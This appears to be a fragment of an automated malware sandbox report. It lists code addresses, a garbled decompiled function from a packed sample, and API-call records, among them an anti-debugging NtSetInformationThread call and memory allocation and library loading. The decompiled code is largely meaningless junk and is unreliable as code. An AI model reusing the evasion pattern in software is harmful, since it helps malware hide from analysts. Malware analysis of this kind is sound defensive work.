                    0x00401961
                    0x00401963
                    0x00401965
                    0x00401967
                    0x0040196b
                    0x0040196d
                    0x00401973
                    0x00401975
                    0x00401977
                    0x00401979
                    0x0040197b
                    0x0040197d
                    0x0040197f
                    0x00401981
                    0x00401985
                    0x00401986
                    0x00401987
                    0x0040198a
                    0x0040198b
                    0x0040198d
                    0x0040198f
                    0x00401995
                    0x00401997
                    0x00401999
                    0x0040199b
                    0x0040199d
                    0x0040199f
                    0x004019a6
                    0x004019a7
                    0x004019ae
                    0x004019b0
                    0x004019b2
                    0x004019b4
                    0x004019b6
                    0x004019b8
                    0x004019ba
                    0x004019bc
                    0x004019be
                    0x004019bf
                    0x004019c2
                    0x004019c3
                    0x004019c5
                    0x004019c7
                    0x004019c9
                    0x004019ce
                    0x004019d0
                    0x004019d2
                    0x004019d4
                    0x004019d6
                    0x004019d8
                    0x004019db
                    0x004019de
                    0x004019e3
                    0x004019e5
                    0x004019e7
                    0x004019e9
                    0x004019eb
                    0x004019ed
                    0x004019ef
                    0x004019f2
                    0x004019f4
                    0x004019f6
                    0x004019f8
                    0x004019fa
                    0x004019fc
                    0x004019fe
                    0x00401a00
                    0x00401a03
                    0x00401a05
                    0x00401a07
                    0x00401a09
                    0x00401a0b
                    0x00401a0e
                    0x00401a0f
                    0x00401a12
                    0x00401a14
                    0x00401a16
                    0x00401a18
                    0x00401a1a
                    0x00401a1c
                    0x00401a1e
                    0x00401a20
                    0x00401a22
                    0x00401a24
                    0x00401a29
                    0x00401a2e
                    0x00401a2f
                    0x00401a32
                    0x00401a33
                    0x00401a36
                    0x00401a38
                    0x00401a3b
                    0x00401a41
                    0x00401a43
                    0x00401a45
                    0x00401a47
                    0x00401a49
                    0x00401a4b
                    0x00401a4d
                    0x00401a4f
                    0x00401a51
                    0x00401a53
                    0x00401a58
                    0x00401a59
                    0x00401a5a
                    0x00401a5b
                    0x00401a5b
                    0x00401a5b
                    0x00401a5e
                    0x00401ad2
                    0x00401ad2
                    0x00401ad3
                    0x00401ad4
                    0x00401ad8
                    0x00401a60
                    0x00401a60
                    0x00401acd
                    0x00401acd
                    0x00000000
                    0x00401a62
                    0x00401a62
                    0x00401a66
                    0x00401a68
                    0x00401a69
                    0x00401a6c
                    0x00401a6e
                    0x00401a72
                    0x00401a74
                    0x00401a75
                    0x00401a77
                    0x00401a7d
                    0x00401a7d
                    0x00401a7e
                    0x00401a82
                    0x00401a84
                    0x00401a8a
                    0x00401a8c
                    0x00401a8e
                    0x00401a90
                    0x00401a92
                    0x00401a94
                    0x00401a96
                    0x00401a98
                    0x00401a9a
                    0x00401a9d
                    0x00401aa0
                    0x00401aa2
                    0x00401aa4
                    0x00401aa6
                    0x00401aa8
                    0x00401aaa
                    0x00401aac
                    0x00401aae
                    0x00401ab0
                    0x00401ab2
                    0x00401ab4
                    0x00401ab6
                    0x00401ab8
                    0x00401aba
                    0x00401abc
                    0x00401ac1
                    0x00401ac3
                    0x00401ac6
                    0x00401ac8
                    0x00000000
                    0x00401ac8
                    0x00401a6c
                    0x00401a60
                    0x00401ad9
                    0x00401adb
                    0x00401add
                    0x00401adf
                    0x00401ae1
                    0x00401ae3
                    0x00401ae5
                    0x00401ae7
                    0x00401ae9
                    0x00401aeb
                    0x00401aed
                    0x00401aef
                    0x00401af1
                    0x00401af3
                    0x00401af5
                    0x00401af7
                    0x00401af9
                    0x00401afb
                    0x00401afd
                    0x00401aff
                    0x00401b01
                    0x00401b03
                    0x00401b07
                    0x00401b09
                    0x00401b0b
                    0x00401b0e
                    0x00401b0f
                    0x00401b16
                    0x00401b18
                    0x00401b1a
                    0x00401b1b
                    0x00401b1d
                    0x00401b1f
                    0x00401b25
                    0x00401b27
                    0x00401b29
                    0x00401b2b
                    0x00401b2d
                    0x00401b2e
                    0x00401b2f
                    0x00401b32
                    0x00401b33
                    0x00401b35
                    0x00401b37
                    0x00401b39
                    0x00401b3c
                    0x00401b3e
                    0x00401b40
                    0x00401b42
                    0x00401b44
                    0x00401b46
                    0x00401b48
                    0x00401b4a
                    0x00401b4b
                    0x00401b4d
                    0x00401b4f
                    0x00401b56
                    0x00401b58
                    0x00401b5a
                    0x00401b5b
                    0x00401b5d
                    0x00401b5f
                    0x00401b66
                    0x00401b69
                    0x00401b6c
                    0x00401b6e
                    0x00401b70
                    0x00401b71
                    0x00401b74
                    0x00401b7d
                    0x00401b80
                    0x00401b81
                    0x00401b83
                    0x00401b85
                    0x00401b87
                    0x00401b89
                    0x00401b8a
                    0x00401b8c
                    0x00401b92
                    0x00401b93
                    0x00401b96
                    0x00401b97
                    0x00401b9a
                    0x00401b9c
                    0x00401b9e
                    0x00401ba1
                    0x00401ba3
                    0x00401ba5
                    0x00401ba7
                    0x00401ba9
                    0x00401bab
                    0x00401bb2
                    0x00401bb6
                    0x00401bb9
                    0x00401bbb
                    0x00401bbd
                    0x00401bbf
                    0x00401bc9
                    0x00401bce
                    0x00401bcf
                    0x00401bd1
                    0x00401bd4
                    0x00401bd6
                    0x00401bd8
                    0x00401bda
                    0x00401bdc
                    0x00401bde
                    0x00401be0
                    0x00401be2
                    0x00401be4
                    0x00401be6
                    0x00401be8
                    0x00401bea
                    0x00401bec
                    0x00401bee
                    0x00401bf0
                    0x00401bf2
                    0x00401bf4
                    0x00401bf6
                    0x00401bf8
                    0x00401bfa
                    0x00401bfc
                    0x00401bfe
                    0x00401c00
                    0x00401c02
                    0x00401c04
                    0x00401c06
                    0x00401c08
                    0x00401c0a
                    0x00401c0c
                    0x00401c0e
                    0x00401c10
                    0x00401c12
                    0x00401c14
                    0x00401c16
                    0x00401c18
                    0x00401c1a
                    0x00401c1c
                    0x00401c1e
                    0x00401c20
                    0x00401c22
                    0x00401c24
                    0x00401c26
                    0x00401c28
                    0x00401c2a
                    0x00401c2c
                    0x00401c2e
                    0x00401c30
                    0x00401c32
                    0x00401c34
                    0x00401c36
                    0x00401c38
                    0x00401c3a
                    0x00401c3c
                    0x00401c3e
                    0x00401c40
                    0x00401c42
                    0x00401c44
                    0x00401c46
                    0x00401c48
                    0x00401c4a
                    0x00401c4c
                    0x00401c4e
                    0x00401c50
                    0x00401c51
                    0x00401c53
                    0x00401c55
                    0x00401c56
                    0x00401c57
                    0x00401c59
                    0x00401c5b
                    0x00401c5e
                    0x00401c5f
                    0x00401c61

                    Memory Dump Source
                    • Source File: 00000004.00000002.2302132577.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.2302129180.0000000000400000.00000002.00020000.sdmp
                    • Associated: 00000004.00000002.2302138392.000000000040D000.00000004.00020000.sdmp
                    • Associated: 00000004.00000002.2302141868.000000000040F000.00000002.00020000.sdmp
                    Similarity
                    • API ID: #100
                    • String ID: VB5!6&*
                    • API String ID: 1341478452-3593831657
                    • Opcode ID: 74c3a27c5e7b214c6470ef477d57e1d50757b982bfcb486dc031bf3b092b0913
                    • Instruction ID: 592f94a81c5e57ebd708ba545b2f23eeb9c7c156f30bca6655cae21d4670f76f
                    • Opcode Fuzzy Hash: 74c3a27c5e7b214c6470ef477d57e1d50757b982bfcb486dc031bf3b092b0913
                    • Instruction Fuzzy Hash: C442CD3244E3C19FC7138B748DA26A27FB4EE1331471D49DFC8C19A1B3D2286A5AD766
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 83%
                    			E00403858() {
                    				signed int _t19;
                    				void* _t21;
                    				void* _t22;
                    				signed int _t23;
                    				signed int _t24;
                    				signed int _t26;
                    				void* _t28;
                    				intOrPtr* _t29;
                    				void* _t36;
                    				signed int _t37;
                    				void* _t38;
                    				signed int _t39;
                    				signed int _t41;
                    
                    				 *_t19 =  *_t19 ^ _t19;
                    				 *_t19 =  *_t19 + _t19;
                    				asm("cdq");
                    				asm("aaa");
                    				asm("bound ebx, [esi-0x45be77cf]");
                    				asm("xlatb");
                    				_t21 = _t36;
                    				_t37 = _t39;
                    				asm("lodsb");
                    				asm("salc");
                    				asm("popfd");
                    				asm("lodsd");
                    				_push(_t21);
                    				es =  *((intOrPtr*)(_t21 - 0x1e064eb6));
                    				_t22 = _t21;
                    				asm("stosb");
                    				 *((intOrPtr*)(_t22 - 0x2d)) =  *((intOrPtr*)(_t22 - 0x2d)) + _t22;
                    				_t23 = _t26 ^  *(_t29 - 0x48ee309a);
                    				_t28 = _t22;
                    				 *_t23 =  *_t23 + _t23;
                    				 *_t23 =  *_t23 + _t23;
                    				 *_t23 =  *_t23 + _t23;
                    				 *_t23 =  *_t23 + _t23;
                    				 *_t23 =  *_t23 + _t23;
                    				 *_t23 =  *_t23 + _t23;
                    				 *_t23 =  *_t23 + _t23;
                    				 *_t23 =  *_t23 + _t23;
                    				 *_t23 =  *_t23 + _t23;
                    				 *_t23 =  *_t23 + _t23;
                    				 *_t23 =  *_t23 + _t23;
                    				 *_t23 =  *_t23 + _t23;
                    				 *_t23 =  *_t23 + _t23;
                    				 *_t23 =  *_t23 + _t23;
                    				 *_t23 =  *_t23 + _t23;
                    				 *_t23 =  *_t23 + _t23;
                    				 *_t23 =  *_t23 + _t23;
                    				 *_t23 =  *_t23 + _t23;
                    				asm("adc eax, [ebx-0x7cf20000]");
                    				 *_t23 =  *_t23 + _t23;
                    				 *_t23 =  *_t23 + _t29;
                    				_t10 = _t37 + 0x66;
                    				 *_t10 =  *((intOrPtr*)(_t37 + 0x66)) + _t29;
                    				asm("o16 jb 0x6b");
                    				asm("popad");
                    				if ( *_t10 <= 0) goto L1;
                    				_t24 = _t23 | 0x45000801;
                    				asm("insd");
                    				if(_t24 >= 0) {
                    					L5:
                    					 *_t24 =  *_t24 + _t24;
                    					 *_t24 =  *_t24 + _t24;
                    					 *_t24 =  *_t24 + _t24;
                    					 *_t24 =  *_t24 + _t24;
                    					 *_t24 =  *_t24 + _t24;
                    					 *_t24 =  *_t24 + _t24;
                    					 *_t24 =  *_t24 + _t24;
                    					 *_t24 =  *_t24 + _t24;
                    					 *_t24 =  *_t24 + _t24;
                    					 *_t24 =  *_t24 + _t24;
                    					 *_t24 =  *_t24 + _t24;
                    					 *_t24 =  *_t24 + _t24;
                    					 *_t24 =  *_t24 + _t24;
                    					 *_t24 =  *_t24 + _t24;
                    					 *_t24 =  *_t24 + _t24;
                    					 *_t24 =  *_t24 + _t24;
                    					 *_t24 =  *_t24 + _t24;
                    					 *_t24 =  *_t24 + _t24;
                    					 *_t24 =  *_t24 + _t24;
                    					 *_t24 =  *_t24 + _t24;
                    					 *_t24 =  *_t24 + _t24;
                    					 *_t24 =  *_t24 + _t24;
                    					 *_t24 =  *_t24 + _t24;
                    					 *_t24 =  *_t24 + _t24;
                    					 *_t24 =  *_t24 + _t24;
                    					 *_t24 =  *_t24 + _t24;
                    					 *_t24 =  *_t24 + _t24;
                    					 *_t24 =  *_t24 + _t24;
                    					 *_t24 =  *_t24 + _t24;
                    					 *_t24 =  *_t24 + _t24;
                    					 *_t24 =  *_t24 + _t24;
                    					 *_t24 =  *_t24 + _t24;
                    					 *_t24 =  *_t24 + _t24;
                    					 *_t24 =  *_t24 + _t24;
                    					 *_t24 =  *_t24 + _t24;
                    					 *_t24 =  *_t24 + _t24;
                    					 *_t24 =  *_t24 + _t24;
                    					 *_t24 =  *_t24 + _t24;
                    					 *_t24 =  *_t24 + _t24;
                    					 *_t24 =  *_t24 + _t24;
                    					 *_t24 =  *_t24 + _t24;
                    					 *_t24 =  *_t24 + _t24;
                    					 *_t24 =  *_t24 + _t24;
                    					 *_t24 =  *_t24 + _t24;
                    					 *_t24 =  *_t24 + _t24;
                    					 *_t24 =  *_t24 + _t24;
                    					 *_t24 =  *_t24 + _t24;
                    					 *_t24 =  *_t24 + _t24;
                    					 *_t24 =  *_t24 + _t24;
                    					 *_t24 =  *_t24 + _t24;
                    					 *_t24 =  *_t24 + _t24;
                    					 *_t24 =  *_t24 + _t24;
                    					 *_t24 =  *_t24 + _t24;
                    					 *_t24 =  *_t24 + _t24;
                    					 *_t24 =  *_t24 + _t24;
                    					 *_t24 =  *_t24 + _t24;
                    					 *_t24 =  *_t24 + _t24;
                    					 *_t24 =  *_t24 + _t24;
                    					 *_t24 =  *_t24 + _t24;
                    					 *_t24 =  *_t24 + _t24;
                    					 *_t24 =  *_t24 + _t24;
                    					 *_t24 =  *_t24 + _t24;
                    					 *_t24 =  *_t24 + _t24;
                    					 *_t24 =  *_t24 + _t24;
                    					 *_t24 =  *_t24 + _t24;
                    					 *_t24 =  *_t24 + _t24;
                    					 *_t24 =  *_t24 + _t24;
                    					 *_t24 =  *_t24 + _t24;
                    					 *_t24 =  *_t24 + _t24;
                    					 *_t24 =  *_t24 + _t24;
                    					 *_t24 =  *_t24 + _t24;
                    					 *_t24 =  *_t24 + _t24;
                    					 *_t24 =  *_t24 + _t24;
                    					 *_t24 =  *_t24 + _t24;
                    					 *_t24 =  *_t24 + _t24;
                    					 *_t24 =  *_t24 + _t24;
                    					 *_t24 =  *_t24 + _t24;
                    					 *_t24 =  *_t24 + _t24;
                    					 *_t24 =  *_t24 + _t24;
                    					 *_t24 =  *_t24 + _t24;
                    					 *_t24 =  *_t24 + _t24;
                    					 *_t24 =  *_t24 + _t24;
                    					 *_t24 =  *_t24 + _t24;
                    					 *_t24 =  *_t24 + _t24;
                    					 *_t24 =  *_t24 + _t24;
                    					 *_t24 =  *_t24 + _t24;
                    					 *_t24 =  *_t24 + _t24;
                    					 *_t24 =  *_t24 + _t24;
                    					 *_t24 =  *_t24 + _t24;
                    					 *_t24 =  *_t24 + _t24;
                    					 *_t24 =  *_t24 + _t24;
                    					 *_t24 =  *_t24 + _t24;
                    					 *_t24 =  *_t24 + _t24;
                    					 *_t24 =  *_t24 + _t24;
                    					 *_t24 =  *_t24 + _t24;
                    					 *_t24 =  *_t24 + _t24;
                    					 *_t24 =  *_t24 + _t24;
                    					 *_t24 =  *_t24 + _t24;
                    					 *_t24 =  *_t24 + _t24;
                    					 *_t24 =  *_t24 + _t24;
                    					 *_t24 =  *_t24 + _t24;
                    					_push(_t24);
                    					asm("packssdw mm7, mm7");
                    					asm("packuswb xmm2, xmm6");
                    					asm("packuswb mm2, mm5");
                    					asm("packuswb xmm1, xmm1");
                    					asm("punpckhdq xmm6, xmm3");
                    					asm("punpckhbw xmm3, xmm3");
                    					asm("packuswb xmm2, xmm0");
                    					asm("packsswb xmm2, xmm7");
                    					asm("punpckhbw mm4, mm6");
                    					asm("packuswb mm7, mm1");
                    				}
                    				_t41 =  *(_t38 + 0x61) * 0x1190065;
                    				 *0xa2a719c1 =  *0xa2a719c1 + _t24;
                    				_t13 = _t38 + 0x6c000082;
                    				 *_t13 =  *(_t38 + 0x6c000082) & _t37;
                    				if ( *_t13 == 0) goto L3;
                    				 *((intOrPtr*)(_t38 + 0x42000082)) =  *((intOrPtr*)(_t38 + 0x42000082)) + 0xa2a719c1;
                    				asm("scasd");
                    				asm("lodsd");
                    				if (_t41 - 1 <= 0) goto L4;
                    				 *_t24 =  *_t24 + _t24;
                    				 *_t24 =  *_t24 + _t24;
                    				 *[ss:eax] =  *[ss:eax] + _t24;
                    				 *_t24 =  *_t24 + _t29;
                    				 *_t24 =  *_t24 + _t24;
                    				_t24 = _t24 + _t24;
                    				 *_t24 =  *_t24 + _t24;
                    				 *0xa2a719c1 =  *0xa2a719c1 + _t28;
                    				 *_t24 =  *_t24 + _t24;
                    				 *_t29 =  *_t29 + _t24;
                    				 *_t24 =  *_t24 + _t28;
                    				 *_t24 =  *_t24 + _t24;
                    				 *_t24 =  *_t24 + _t24;
                    				 *((intOrPtr*)(_t24 + 0x82)) =  *((intOrPtr*)(_t24 + 0x82)) + _t24;
                    				 *_t24 =  *_t24 + _t24;
                    				 *_t24 =  *_t24 + _t24;
                    				 *_t24 =  *_t24 + _t24;
                    				 *_t24 =  *_t24 + _t24;
                    				 *_t24 =  *_t24 + _t24;
                    				 *_t24 =  *_t24 + _t24;
                    				 *_t24 =  *_t24 + _t24;
                    				 *_t24 =  *_t24 + _t24;
                    				 *_t24 =  *_t24 + _t24;
                    				 *_t24 =  *_t24 + _t24;
                    				 *_t24 =  *_t24 + _t24;
                    				 *_t24 =  *_t24 + _t24;
                    				 *_t24 =  *_t24 + _t24;
                    				 *_t24 =  *_t24 + _t24;
                    				 *_t24 =  *_t24 + _t24;
                    				 *_t24 =  *_t24 + _t24;
                    				 *_t24 =  *_t24 + _t24;
                    				 *_t24 =  *_t24 + _t24;
                    				 *_t24 =  *_t24 + _t24;
                    				goto L5;
                    			}

















                    APIs
                    • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302132577.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.2302129180.0000000000400000.00000002.00020000.sdmp
                    • Associated: 00000004.00000002.2302138392.000000000040D000.00000004.00020000.sdmp
                    • Associated: 00000004.00000002.2302141868.000000000040F000.00000002.00020000.sdmp
                    Similarity
                    • API ID: AllocVirtual
                    • String ID: E>
                    • API String ID: 4275171209-855000429
                    • Opcode ID: fc4662d94897bbd8d95064013dc74adebccc8bd2ef655760d3a9a967357b9423
                    • Instruction ID: 8e196667fc9cf8ea1f1595be977f2233d61e135b0e9b019b9f32fb53a38ceb6a
                    • Opcode Fuzzy Hash: fc4662d94897bbd8d95064013dc74adebccc8bd2ef655760d3a9a967357b9423
                    • Instruction Fuzzy Hash: FAF1D4D1A2E743C6E593657000C543159A4EEA735A6778BFB6723728C2A33E434B728F
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00310570,00000000,00000000,00000000,00000000), ref: 003105F8
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302114614.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                    Similarity
                    • API ID: InformationThread
                    • String ID: 1.!T
                    • API String ID: 4046476035-3147410236
                    • Opcode ID: d197fca17fc0180e67d21b6e592c0604f74eaffedbc1dc2732cf89e1772ce896
                    • Instruction ID: 85c883a0b6f74242c6db4fb83a2c43c8e3cce5ace7b7cabbe30f0f702d8ef017
                    • Opcode Fuzzy Hash: d197fca17fc0180e67d21b6e592c0604f74eaffedbc1dc2732cf89e1772ce896
                    • Instruction Fuzzy Hash: A2317B74344309AAFB1E7E388D627EB26959F4D794F604129FD86AF2C1E7A4CCC0C650
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 0031481A: LoadLibraryA.KERNEL32(?,082962C8,?,003104E9,00000000,00000000,00000040,00000000,?), ref: 003148E9
                    • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00310570,00000000,00000000,00000000,00000000), ref: 003105F8
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302114614.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                    Similarity
                    • API ID: InformationLibraryLoadThread
                    • String ID: 1.!T
                    • API String ID: 543350213-3147410236
                    • Opcode ID: 03aec2ffbe5e581895b6571daf0e6ec3fd688edb95b59fdd0e8480aa69ee8f65
                    • Instruction ID: 95bfbbde8e5144fd09a4c1453872a684db2ea4c1e66b6ba3dcd28e41abbd3e20
                    • Opcode Fuzzy Hash: 03aec2ffbe5e581895b6571daf0e6ec3fd688edb95b59fdd0e8480aa69ee8f65
                    • Instruction Fuzzy Hash: A4317C74344309AAFB1E7E388D627EB26999F4DB94F604119FD86AF1C1DBA4CCC1C650
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 0031481A: LoadLibraryA.KERNEL32(?,082962C8,?,003104E9,00000000,00000000,00000040,00000000,?), ref: 003148E9
                    • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00310570,00000000,00000000,00000000,00000000), ref: 003105F8
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302114614.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                    Similarity
                    • API ID: InformationLibraryLoadThread
                    • String ID: 1.!T
                    • API String ID: 543350213-3147410236
                    • Opcode ID: 5410f9e8353f6808882fe80bba05084f64ab9930763612efe02085c409cfcd2f
                    • Instruction ID: 651d2a3533e24775b3298652591ca9047375c0cb40caef92a89f97d89c96af4b
                    • Opcode Fuzzy Hash: 5410f9e8353f6808882fe80bba05084f64ab9930763612efe02085c409cfcd2f
                    • Instruction Fuzzy Hash: 30315C743443099AFB1E7E388D627EB26959F4D794F504119FD86AF2C1DBA4CCC1C650
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 0031481A: LoadLibraryA.KERNEL32(?,082962C8,?,003104E9,00000000,00000000,00000040,00000000,?), ref: 003148E9
                    • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00310570,00000000,00000000,00000000,00000000), ref: 003105F8
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302114614.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                    Similarity
                    • API ID: InformationLibraryLoadThread
                    • String ID: 1.!T
                    • API String ID: 543350213-3147410236
                    • Opcode ID: 8ceb285f3d875a0eee6ecbe0854fc9ed2e6294d8f7718fe7067693a0749cc1eb
                    • Instruction ID: 145023c8836b2c3057a3b92ab1dda6820f5cc58f1fa64dfb65631a3512e0df95
                    • Opcode Fuzzy Hash: 8ceb285f3d875a0eee6ecbe0854fc9ed2e6294d8f7718fe7067693a0749cc1eb
                    • Instruction Fuzzy Hash: 6C217834344309AAFB1D6E388E62BE726999F49B94FA00119FD86AF2C1D7A0DCC0C650
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 0031481A: LoadLibraryA.KERNEL32(?,082962C8,?,003104E9,00000000,00000000,00000040,00000000,?), ref: 003148E9
                    • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00310570,00000000,00000000,00000000,00000000), ref: 003105F8
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302114614.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                    Similarity
                    • API ID: InformationLibraryLoadThread
                    • String ID: 1.!T
                    • API String ID: 543350213-3147410236
                    • Opcode ID: eb2d2b0faa92adf65643db54b5c8bc31df9528c1fea867c12eec3e43d2b49427
                    • Instruction ID: fa76eb0f0b08a5046f8d0dd58af47fec2d13c0ea543e048e164b98b1edea8d9f
                    • Opcode Fuzzy Hash: eb2d2b0faa92adf65643db54b5c8bc31df9528c1fea867c12eec3e43d2b49427
                    • Instruction Fuzzy Hash: 81214974344309AAFB1E2E388D62BE722999F09BD4F900115FD86AF1C1E7A5C8C0C251
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00310570,00000000,00000000,00000000,00000000), ref: 003105F8
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302114614.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                    Similarity
                    • API ID: InformationThread
                    • String ID: 1.!T
                    • API String ID: 4046476035-3147410236
                    • Opcode ID: 6a2ee03b46db307b5a37b1d3fe185f7671c280c203ee62c2d50521e14eca7b9e
                    • Instruction ID: 763261b5dac38040d9648096c94685c16d5f65011d14262867c87dcde5b5a9ad
                    • Opcode Fuzzy Hash: 6a2ee03b46db307b5a37b1d3fe185f7671c280c203ee62c2d50521e14eca7b9e
                    • Instruction Fuzzy Hash: 02216A78205349ABFB1E6E388DB17DB37989F0A7A4F904119FC869F1C1D7A4C8C1C661
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 0031481A: LoadLibraryA.KERNEL32(?,082962C8,?,003104E9,00000000,00000000,00000040,00000000,?), ref: 003148E9
                    • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00310570,00000000,00000000,00000000,00000000), ref: 003105F8
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302114614.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                    Similarity
                    • API ID: InformationLibraryLoadThread
                    • String ID: 1.!T
                    • API String ID: 543350213-3147410236
                    • Opcode ID: ee4061a47e12fe1cb0a2dacac262a7e618d3b7ff24a38530bca62724974c2d90
                    • Instruction ID: ee192c99c77cc6732be230f1b7ff71c4bcc3bac1d1bb41368fe7116eab0f5dde
                    • Opcode Fuzzy Hash: ee4061a47e12fe1cb0a2dacac262a7e618d3b7ff24a38530bca62724974c2d90
                    • Instruction Fuzzy Hash: EB1138743053499AFB2D6E388DA17DA3798EF49B94F600219FC56AB2C1D7A4D8C0C690
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • LdrInitializeThunk.NTDLL(0031157A,?,00000000,?,00000017,0000035D,?,003139E3,?), ref: 0031376A
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302114614.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                    Similarity
                    • API ID: InitializeThunk
                    • String ID: ninet.dll
                    • API String ID: 2994545307-2962335871
                    • Opcode ID: 8c6cb2a92d30fc999c743c1c07706b9559c33b4a09a460089fedd49e23e1355d
                    • Instruction ID: 94212b7027d7ef041e1e2f7ec0e6c9d518ef90ef182fd3f8adb91313b364d7a2
                    • Opcode Fuzzy Hash: 8c6cb2a92d30fc999c743c1c07706b9559c33b4a09a460089fedd49e23e1355d
                    • Instruction Fuzzy Hash: D0E0CD710056428BD31FB7144A47BD777A0DF45780F08C4795483C7562DB34B61DD646
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302132577.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.2302129180.0000000000400000.00000002.00020000.sdmp
                    • Associated: 00000004.00000002.2302138392.000000000040D000.00000004.00020000.sdmp
                    • Associated: 00000004.00000002.2302141868.000000000040F000.00000002.00020000.sdmp
                    Similarity
                    • API ID: AllocVirtual
                    • String ID: E>
                    • API String ID: 4275171209-855000429
                    • Opcode ID: 75140aaa6b0aaa3a8e99ab5c95853340ef05739d3eeda00674af5c54bcf9fa78
                    • Instruction ID: 0ca081bcadcb907f92dd78911a4f752f076383b79774a671cad4f7296ae3b344
                    • Opcode Fuzzy Hash: 75140aaa6b0aaa3a8e99ab5c95853340ef05739d3eeda00674af5c54bcf9fa78
                    • Instruction Fuzzy Hash: FED15CD5A2E703C5E493657140C547154A4EEA735A5738BBB6B33728C2A33E938B328F
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302132577.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.2302129180.0000000000400000.00000002.00020000.sdmp
                    • Associated: 00000004.00000002.2302138392.000000000040D000.00000004.00020000.sdmp
                    • Associated: 00000004.00000002.2302141868.000000000040F000.00000002.00020000.sdmp
                    Similarity
                    • API ID: AllocVirtual
                    • String ID: E>
                    • API String ID: 4275171209-855000429
                    • Opcode ID: 81d723dee46c8a333d7a4c1eeee27e9c1f0367bf5a236c6878a5f93cbe02ed79
                    • Instruction ID: c3397bc43d08b1c1228f7726ccd88f792ac617b51ee6aafecb7cebe38466101a
                    • Opcode Fuzzy Hash: 81d723dee46c8a333d7a4c1eeee27e9c1f0367bf5a236c6878a5f93cbe02ed79
                    • Instruction Fuzzy Hash: 94E14CD5A2E703C5E493657140C547158A4EEA735A5738BBB6B33728C2A33E534B328F
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302132577.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.2302129180.0000000000400000.00000002.00020000.sdmp
                    • Associated: 00000004.00000002.2302138392.000000000040D000.00000004.00020000.sdmp
                    • Associated: 00000004.00000002.2302141868.000000000040F000.00000002.00020000.sdmp
                    Similarity
                    • API ID: AllocVirtual
                    • String ID: E>
                    • API String ID: 4275171209-855000429
                    • Opcode ID: 97c9562cdbac4147a52a8023e3b75503e3b44e7eaa7e0d78d92bac5695e9ce88
                    • Instruction ID: 3f12c97372ce28f349635d59b4d4a7aced63875873a55da9ed396069577c3eb1
                    • Opcode Fuzzy Hash: 97c9562cdbac4147a52a8023e3b75503e3b44e7eaa7e0d78d92bac5695e9ce88
                    • Instruction Fuzzy Hash: 03D15DD5A2E703C5E493657140C547154A4EEA735A5738BBB6B33728C2A33E938B328F
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302132577.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
